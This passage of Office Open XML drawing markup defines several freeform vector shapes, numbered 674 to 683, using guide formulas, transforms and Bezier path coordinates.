                      <a:pt x="184" y="122"/>
                      <a:pt x="184" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="184" y="47"/>
                      <a:pt x="184" y="47"/>
                      <a:pt x="115" y="4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0" name="Freeform 674">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E38DD4DC-5A65-441A-9E05-9BB328F0F7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18014" y="11566526"/>
                <a:ext cx="95250" cy="82550"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 115 w 231"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 0 w 231"/>
                  <a:gd name="T3" fmla="*/ 84 h 200"/>
                  <a:gd name="T4" fmla="*/ 115 w 231"/>
                  <a:gd name="T5" fmla="*/ 0 h 200"/>
                  <a:gd name="T6" fmla="*/ 231 w 231"/>
                  <a:gd name="T7" fmla="*/ 84 h 200"/>
                  <a:gd name="T8" fmla="*/ 115 w 231"/>
                  <a:gd name="T9" fmla="*/ 200 h 200"/>
                  <a:gd name="T10" fmla="*/ 115 w 231"/>
                  <a:gd name="T11" fmla="*/ 47 h 200"/>
                  <a:gd name="T12" fmla="*/ 47 w 231"/>
                  <a:gd name="T13" fmla="*/ 84 h 200"/>
                  <a:gd name="T14" fmla="*/ 115 w 231"/>
                  <a:gd name="T15" fmla="*/ 153 h 200"/>
                  <a:gd name="T16" fmla="*/ 184 w 231"/>
                  <a:gd name="T17" fmla="*/ 84 h 200"/>
                  <a:gd name="T18" fmla="*/ 115 w 231"/>
                  <a:gd name="T19" fmla="*/ 47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1" h="200">
                    <a:moveTo>
                      <a:pt x="115" y="200"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="200"/>
                      <a:pt x="0" y="148"/>
                      <a:pt x="0" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="14"/>
                      <a:pt x="18" y="0"/>
                      <a:pt x="115" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="212" y="0"/>
                      <a:pt x="231" y="14"/>
                      <a:pt x="231" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="231" y="148"/>
                      <a:pt x="179" y="200"/>
                      <a:pt x="115" y="200"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="115" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="47"/>
                      <a:pt x="47" y="47"/>
                      <a:pt x="47" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="122"/>
                      <a:pt x="77" y="153"/>
                      <a:pt x="115" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="153"/>
                      <a:pt x="184" y="122"/>
                      <a:pt x="184" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="184" y="47"/>
                      <a:pt x="184" y="47"/>
                      <a:pt x="115" y="4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1" name="Freeform 675">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{520C7E7D-B4B2-49B6-A00E-F35B485043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6276" y="11558588"/>
                <a:ext cx="63500" cy="31750"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 152"/>
                  <a:gd name="T1" fmla="*/ 76 h 76"/>
                  <a:gd name="T2" fmla="*/ 3 w 152"/>
                  <a:gd name="T3" fmla="*/ 59 h 76"/>
                  <a:gd name="T4" fmla="*/ 20 w 152"/>
                  <a:gd name="T5" fmla="*/ 31 h 76"/>
                  <a:gd name="T6" fmla="*/ 120 w 152"/>
                  <a:gd name="T7" fmla="*/ 3 h 76"/>
                  <a:gd name="T8" fmla="*/ 148 w 152"/>
                  <a:gd name="T9" fmla="*/ 20 h 76"/>
                  <a:gd name="T10" fmla="*/ 132 w 152"/>
                  <a:gd name="T11" fmla="*/ 48 h 76"/>
                  <a:gd name="T12" fmla="*/ 32 w 152"/>
                  <a:gd name="T13" fmla="*/ 76 h 76"/>
                  <a:gd name="T14" fmla="*/ 26 w 152"/>
                  <a:gd name="T15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76">
                    <a:moveTo>
                      <a:pt x="26" y="76"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="76"/>
                      <a:pt x="6" y="70"/>
                      <a:pt x="3" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="47"/>
                      <a:pt x="7" y="34"/>
                      <a:pt x="20" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="3"/>
                      <a:pt x="120" y="3"/>
                      <a:pt x="120" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="0"/>
                      <a:pt x="145" y="7"/>
                      <a:pt x="148" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="152" y="32"/>
                      <a:pt x="144" y="45"/>
                      <a:pt x="132" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="76"/>
                      <a:pt x="32" y="76"/>
                      <a:pt x="32" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="76"/>
                      <a:pt x="28" y="76"/>
                      <a:pt x="26" y="76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2" name="Freeform 676">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F941AD6-BAA5-4F99-8B78-BA0023A89E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78326" y="11591926"/>
                <a:ext cx="58738" cy="19050"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 117 w 141"/>
                  <a:gd name="T1" fmla="*/ 47 h 47"/>
                  <a:gd name="T2" fmla="*/ 23 w 141"/>
                  <a:gd name="T3" fmla="*/ 47 h 47"/>
                  <a:gd name="T4" fmla="*/ 0 w 141"/>
                  <a:gd name="T5" fmla="*/ 23 h 47"/>
                  <a:gd name="T6" fmla="*/ 23 w 141"/>
                  <a:gd name="T7" fmla="*/ 0 h 47"/>
                  <a:gd name="T8" fmla="*/ 117 w 141"/>
                  <a:gd name="T9" fmla="*/ 0 h 47"/>
                  <a:gd name="T10" fmla="*/ 141 w 141"/>
                  <a:gd name="T11" fmla="*/ 23 h 47"/>
                  <a:gd name="T12" fmla="*/ 117 w 141"/>
                  <a:gd name="T1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1" h="47">
                    <a:moveTo>
                      <a:pt x="117" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="47"/>
                      <a:pt x="23" y="47"/>
                      <a:pt x="23" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="47"/>
                      <a:pt x="0" y="36"/>
                      <a:pt x="0" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="11"/>
                      <a:pt x="10" y="0"/>
                      <a:pt x="23" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="0"/>
                      <a:pt x="117" y="0"/>
                      <a:pt x="117" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="0"/>
                      <a:pt x="141" y="11"/>
                      <a:pt x="141" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="36"/>
                      <a:pt x="130" y="47"/>
                      <a:pt x="117" y="4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3" name="Freeform 677">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39E130A8-66E8-41A5-86AF-2D86272EA5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4351" y="11710988"/>
                <a:ext cx="19050" cy="79375"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 46"/>
                  <a:gd name="T1" fmla="*/ 192 h 192"/>
                  <a:gd name="T2" fmla="*/ 0 w 46"/>
                  <a:gd name="T3" fmla="*/ 169 h 192"/>
                  <a:gd name="T4" fmla="*/ 0 w 46"/>
                  <a:gd name="T5" fmla="*/ 23 h 192"/>
                  <a:gd name="T6" fmla="*/ 23 w 46"/>
                  <a:gd name="T7" fmla="*/ 0 h 192"/>
                  <a:gd name="T8" fmla="*/ 46 w 46"/>
                  <a:gd name="T9" fmla="*/ 23 h 192"/>
                  <a:gd name="T10" fmla="*/ 46 w 46"/>
                  <a:gd name="T11" fmla="*/ 169 h 192"/>
                  <a:gd name="T12" fmla="*/ 23 w 46"/>
                  <a:gd name="T13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192">
                    <a:moveTo>
                      <a:pt x="23" y="192"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="192"/>
                      <a:pt x="0" y="182"/>
                      <a:pt x="0" y="169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36" y="0"/>
                      <a:pt x="46" y="10"/>
                      <a:pt x="46" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="169"/>
                      <a:pt x="46" y="169"/>
                      <a:pt x="46" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="182"/>
                      <a:pt x="36" y="192"/>
                      <a:pt x="23" y="192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4" name="Freeform 678">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92789BE6-5A0C-4FDE-BCBE-96F87C6BCE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3576" y="11707813"/>
                <a:ext cx="152400" cy="320675"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 340 w 366"/>
                  <a:gd name="T1" fmla="*/ 773 h 773"/>
                  <a:gd name="T2" fmla="*/ 317 w 366"/>
                  <a:gd name="T3" fmla="*/ 750 h 773"/>
                  <a:gd name="T4" fmla="*/ 317 w 366"/>
                  <a:gd name="T5" fmla="*/ 446 h 773"/>
                  <a:gd name="T6" fmla="*/ 259 w 366"/>
                  <a:gd name="T7" fmla="*/ 307 h 773"/>
                  <a:gd name="T8" fmla="*/ 14 w 366"/>
                  <a:gd name="T9" fmla="*/ 196 h 773"/>
                  <a:gd name="T10" fmla="*/ 0 w 366"/>
                  <a:gd name="T11" fmla="*/ 175 h 773"/>
                  <a:gd name="T12" fmla="*/ 0 w 366"/>
                  <a:gd name="T13" fmla="*/ 23 h 773"/>
                  <a:gd name="T14" fmla="*/ 23 w 366"/>
                  <a:gd name="T15" fmla="*/ 0 h 773"/>
                  <a:gd name="T16" fmla="*/ 46 w 366"/>
                  <a:gd name="T17" fmla="*/ 23 h 773"/>
                  <a:gd name="T18" fmla="*/ 46 w 366"/>
                  <a:gd name="T19" fmla="*/ 159 h 773"/>
                  <a:gd name="T20" fmla="*/ 281 w 366"/>
                  <a:gd name="T21" fmla="*/ 266 h 773"/>
                  <a:gd name="T22" fmla="*/ 363 w 366"/>
                  <a:gd name="T23" fmla="*/ 447 h 773"/>
                  <a:gd name="T24" fmla="*/ 363 w 366"/>
                  <a:gd name="T25" fmla="*/ 750 h 773"/>
                  <a:gd name="T26" fmla="*/ 340 w 366"/>
                  <a:gd name="T27" fmla="*/ 773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6" h="773">
                    <a:moveTo>
                      <a:pt x="340" y="773"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="327" y="773"/>
                      <a:pt x="317" y="763"/>
                      <a:pt x="317" y="750"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="317" y="446"/>
                      <a:pt x="317" y="446"/>
                      <a:pt x="317" y="446"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="317" y="444"/>
                      <a:pt x="318" y="339"/>
                      <a:pt x="259" y="307"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="268"/>
                      <a:pt x="16" y="197"/>
                      <a:pt x="14" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="193"/>
                      <a:pt x="0" y="184"/>
                      <a:pt x="0" y="175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0" y="0"/>
                      <a:pt x="23" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="0"/>
                      <a:pt x="46" y="10"/>
                      <a:pt x="46" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="159"/>
                      <a:pt x="46" y="159"/>
                      <a:pt x="46" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="177"/>
                      <a:pt x="220" y="232"/>
                      <a:pt x="281" y="266"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="366" y="312"/>
                      <a:pt x="363" y="441"/>
                      <a:pt x="363" y="447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="363" y="750"/>
                      <a:pt x="363" y="750"/>
                      <a:pt x="363" y="750"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="363" y="763"/>
                      <a:pt x="353" y="773"/>
                      <a:pt x="340" y="773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5" name="Freeform 679">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A71966B-6454-4F7C-8A2D-E9AF86657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2764" y="11769726"/>
                <a:ext cx="171450" cy="58738"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 203 w 413"/>
                  <a:gd name="T1" fmla="*/ 141 h 141"/>
                  <a:gd name="T2" fmla="*/ 7 w 413"/>
                  <a:gd name="T3" fmla="*/ 39 h 141"/>
                  <a:gd name="T4" fmla="*/ 14 w 413"/>
                  <a:gd name="T5" fmla="*/ 7 h 141"/>
                  <a:gd name="T6" fmla="*/ 46 w 413"/>
                  <a:gd name="T7" fmla="*/ 14 h 141"/>
                  <a:gd name="T8" fmla="*/ 203 w 413"/>
                  <a:gd name="T9" fmla="*/ 94 h 141"/>
                  <a:gd name="T10" fmla="*/ 368 w 413"/>
                  <a:gd name="T11" fmla="*/ 14 h 141"/>
                  <a:gd name="T12" fmla="*/ 400 w 413"/>
                  <a:gd name="T13" fmla="*/ 8 h 141"/>
                  <a:gd name="T14" fmla="*/ 406 w 413"/>
                  <a:gd name="T15" fmla="*/ 40 h 141"/>
                  <a:gd name="T16" fmla="*/ 203 w 413"/>
                  <a:gd name="T17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3" h="141">
                    <a:moveTo>
                      <a:pt x="203" y="141"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="141"/>
                      <a:pt x="9" y="43"/>
                      <a:pt x="7" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="28"/>
                      <a:pt x="3" y="14"/>
                      <a:pt x="14" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="0"/>
                      <a:pt x="39" y="4"/>
                      <a:pt x="46" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="18"/>
                      <a:pt x="98" y="94"/>
                      <a:pt x="203" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="94"/>
                      <a:pt x="365" y="17"/>
                      <a:pt x="368" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="375" y="3"/>
                      <a:pt x="389" y="0"/>
                      <a:pt x="400" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="411" y="15"/>
                      <a:pt x="413" y="29"/>
                      <a:pt x="406" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="403" y="44"/>
                      <a:pt x="337" y="141"/>
                      <a:pt x="203" y="141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6" name="Freeform 680">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99A06F2C-7E04-41A8-BCED-185E45EA3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1001" y="11707813"/>
                <a:ext cx="152400" cy="320675"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 365"/>
                  <a:gd name="T1" fmla="*/ 773 h 773"/>
                  <a:gd name="T2" fmla="*/ 2 w 365"/>
                  <a:gd name="T3" fmla="*/ 750 h 773"/>
                  <a:gd name="T4" fmla="*/ 2 w 365"/>
                  <a:gd name="T5" fmla="*/ 446 h 773"/>
                  <a:gd name="T6" fmla="*/ 84 w 365"/>
                  <a:gd name="T7" fmla="*/ 266 h 773"/>
                  <a:gd name="T8" fmla="*/ 319 w 365"/>
                  <a:gd name="T9" fmla="*/ 159 h 773"/>
                  <a:gd name="T10" fmla="*/ 319 w 365"/>
                  <a:gd name="T11" fmla="*/ 23 h 773"/>
                  <a:gd name="T12" fmla="*/ 342 w 365"/>
                  <a:gd name="T13" fmla="*/ 0 h 773"/>
                  <a:gd name="T14" fmla="*/ 365 w 365"/>
                  <a:gd name="T15" fmla="*/ 23 h 773"/>
                  <a:gd name="T16" fmla="*/ 365 w 365"/>
                  <a:gd name="T17" fmla="*/ 175 h 773"/>
                  <a:gd name="T18" fmla="*/ 351 w 365"/>
                  <a:gd name="T19" fmla="*/ 196 h 773"/>
                  <a:gd name="T20" fmla="*/ 106 w 365"/>
                  <a:gd name="T21" fmla="*/ 307 h 773"/>
                  <a:gd name="T22" fmla="*/ 48 w 365"/>
                  <a:gd name="T23" fmla="*/ 446 h 773"/>
                  <a:gd name="T24" fmla="*/ 48 w 365"/>
                  <a:gd name="T25" fmla="*/ 750 h 773"/>
                  <a:gd name="T26" fmla="*/ 25 w 365"/>
                  <a:gd name="T27" fmla="*/ 773 h 7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5" h="773">
                    <a:moveTo>
                      <a:pt x="25" y="773"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="773"/>
                      <a:pt x="2" y="763"/>
                      <a:pt x="2" y="750"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="446"/>
                      <a:pt x="2" y="446"/>
                      <a:pt x="2" y="446"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="441"/>
                      <a:pt x="0" y="312"/>
                      <a:pt x="84" y="266"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="232"/>
                      <a:pt x="275" y="177"/>
                      <a:pt x="319" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="319" y="23"/>
                      <a:pt x="319" y="23"/>
                      <a:pt x="319" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="319" y="10"/>
                      <a:pt x="329" y="0"/>
                      <a:pt x="342" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="355" y="0"/>
                      <a:pt x="365" y="10"/>
                      <a:pt x="365" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="365" y="175"/>
                      <a:pt x="365" y="175"/>
                      <a:pt x="365" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="365" y="184"/>
                      <a:pt x="360" y="193"/>
                      <a:pt x="351" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="349" y="197"/>
                      <a:pt x="177" y="268"/>
                      <a:pt x="106" y="307"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="339"/>
                      <a:pt x="48" y="444"/>
                      <a:pt x="48" y="446"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="750"/>
                      <a:pt x="48" y="750"/>
                      <a:pt x="48" y="750"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="763"/>
                      <a:pt x="38" y="773"/>
                      <a:pt x="25" y="773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7" name="Freeform 681">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD38050-D789-4332-BF46-BA8BA854760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57676" y="11407776"/>
                <a:ext cx="301625" cy="341313"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 363 w 725"/>
                  <a:gd name="T1" fmla="*/ 820 h 820"/>
                  <a:gd name="T2" fmla="*/ 0 w 725"/>
                  <a:gd name="T3" fmla="*/ 458 h 820"/>
                  <a:gd name="T4" fmla="*/ 0 w 725"/>
                  <a:gd name="T5" fmla="*/ 362 h 820"/>
                  <a:gd name="T6" fmla="*/ 363 w 725"/>
                  <a:gd name="T7" fmla="*/ 0 h 820"/>
                  <a:gd name="T8" fmla="*/ 725 w 725"/>
                  <a:gd name="T9" fmla="*/ 362 h 820"/>
                  <a:gd name="T10" fmla="*/ 725 w 725"/>
                  <a:gd name="T11" fmla="*/ 458 h 820"/>
                  <a:gd name="T12" fmla="*/ 363 w 725"/>
                  <a:gd name="T13" fmla="*/ 820 h 820"/>
                  <a:gd name="T14" fmla="*/ 363 w 725"/>
                  <a:gd name="T15" fmla="*/ 47 h 820"/>
                  <a:gd name="T16" fmla="*/ 47 w 725"/>
                  <a:gd name="T17" fmla="*/ 362 h 820"/>
                  <a:gd name="T18" fmla="*/ 47 w 725"/>
                  <a:gd name="T19" fmla="*/ 458 h 820"/>
                  <a:gd name="T20" fmla="*/ 363 w 725"/>
                  <a:gd name="T21" fmla="*/ 773 h 820"/>
                  <a:gd name="T22" fmla="*/ 678 w 725"/>
                  <a:gd name="T23" fmla="*/ 458 h 820"/>
                  <a:gd name="T24" fmla="*/ 678 w 725"/>
                  <a:gd name="T25" fmla="*/ 362 h 820"/>
                  <a:gd name="T26" fmla="*/ 363 w 725"/>
                  <a:gd name="T27" fmla="*/ 47 h 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5" h="820">
                    <a:moveTo>
                      <a:pt x="363" y="820"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="820"/>
                      <a:pt x="0" y="658"/>
                      <a:pt x="0" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="362"/>
                      <a:pt x="0" y="362"/>
                      <a:pt x="0" y="362"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="163"/>
                      <a:pt x="163" y="0"/>
                      <a:pt x="363" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="562" y="0"/>
                      <a:pt x="725" y="163"/>
                      <a:pt x="725" y="362"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="458"/>
                      <a:pt x="725" y="458"/>
                      <a:pt x="725" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="658"/>
                      <a:pt x="562" y="820"/>
                      <a:pt x="363" y="820"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="363" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="47"/>
                      <a:pt x="47" y="188"/>
                      <a:pt x="47" y="362"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="458"/>
                      <a:pt x="47" y="458"/>
                      <a:pt x="47" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="632"/>
                      <a:pt x="189" y="773"/>
                      <a:pt x="363" y="773"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="537" y="773"/>
                      <a:pt x="678" y="632"/>
                      <a:pt x="678" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="678" y="362"/>
                      <a:pt x="678" y="362"/>
                      <a:pt x="678" y="362"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="678" y="188"/>
                      <a:pt x="537" y="47"/>
                      <a:pt x="363" y="4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8" name="Freeform 682">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5600F0A0-ADE1-45A1-82CB-462AE76385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0851" y="11560176"/>
                <a:ext cx="63500" cy="31750"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 126 w 152"/>
                  <a:gd name="T1" fmla="*/ 77 h 77"/>
                  <a:gd name="T2" fmla="*/ 120 w 152"/>
                  <a:gd name="T3" fmla="*/ 76 h 77"/>
                  <a:gd name="T4" fmla="*/ 20 w 152"/>
                  <a:gd name="T5" fmla="*/ 48 h 77"/>
                  <a:gd name="T6" fmla="*/ 4 w 152"/>
                  <a:gd name="T7" fmla="*/ 20 h 77"/>
                  <a:gd name="T8" fmla="*/ 32 w 152"/>
                  <a:gd name="T9" fmla="*/ 4 h 77"/>
                  <a:gd name="T10" fmla="*/ 132 w 152"/>
                  <a:gd name="T11" fmla="*/ 31 h 77"/>
                  <a:gd name="T12" fmla="*/ 149 w 152"/>
                  <a:gd name="T13" fmla="*/ 59 h 77"/>
                  <a:gd name="T14" fmla="*/ 126 w 152"/>
                  <a:gd name="T15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2" h="77">
                    <a:moveTo>
                      <a:pt x="126" y="77"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="77"/>
                      <a:pt x="122" y="76"/>
                      <a:pt x="120" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="48"/>
                      <a:pt x="20" y="48"/>
                      <a:pt x="20" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="45"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="4" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="8"/>
                      <a:pt x="20" y="0"/>
                      <a:pt x="32" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="31"/>
                      <a:pt x="132" y="31"/>
                      <a:pt x="132" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="34"/>
                      <a:pt x="152" y="47"/>
                      <a:pt x="149" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="70"/>
                      <a:pt x="137" y="77"/>
                      <a:pt x="126" y="7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39" name="Freeform 683">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B510B84-8B2E-4216-A4FA-06A3BE9899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9426" y="11784013"/>
                <a:ext cx="128588" cy="95250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 60 w 310"/>
                  <a:gd name="T1" fmla="*/ 229 h 229"/>
                  <a:gd name="T2" fmla="*/ 51 w 310"/>
                  <a:gd name="T3" fmla="*/ 227 h 229"/>
                  <a:gd name="T4" fmla="*/ 37 w 310"/>
                  <a:gd name="T5" fmla="*/ 210 h 229"/>
                  <a:gd name="T6" fmla="*/ 2 w 310"/>
                  <a:gd name="T7" fmla="*/ 30 h 229"/>
                  <a:gd name="T8" fmla="*/ 20 w 310"/>
                  <a:gd name="T9" fmla="*/ 3 h 229"/>
                  <a:gd name="T10" fmla="*/ 48 w 310"/>
                  <a:gd name="T11" fmla="*/ 21 h 229"/>
                  <a:gd name="T12" fmla="*/ 77 w 310"/>
                  <a:gd name="T13" fmla="*/ 170 h 229"/>
                  <a:gd name="T14" fmla="*/ 272 w 310"/>
                  <a:gd name="T15" fmla="*/ 61 h 229"/>
                  <a:gd name="T16" fmla="*/ 304 w 310"/>
                  <a:gd name="T17" fmla="*/ 70 h 229"/>
                  <a:gd name="T18" fmla="*/ 295 w 310"/>
                  <a:gd name="T19" fmla="*/ 102 h 229"/>
                  <a:gd name="T20" fmla="*/ 72 w 310"/>
                  <a:gd name="T21" fmla="*/ 226 h 229"/>
                  <a:gd name="T22" fmla="*/ 60 w 310"/>
                  <a:gd name="T23" fmla="*/ 229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0" h="229">
                    <a:moveTo>
                      <a:pt x="60" y="229"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="229"/>
                      <a:pt x="54" y="228"/>
                      <a:pt x="51" y="227"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="224"/>
                      <a:pt x="39" y="218"/>
                      <a:pt x="37" y="210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18"/>
                      <a:pt x="8" y="5"/>
                      <a:pt x="20" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="0"/>
                      <a:pt x="45" y="9"/>
                      <a:pt x="48" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="170"/>
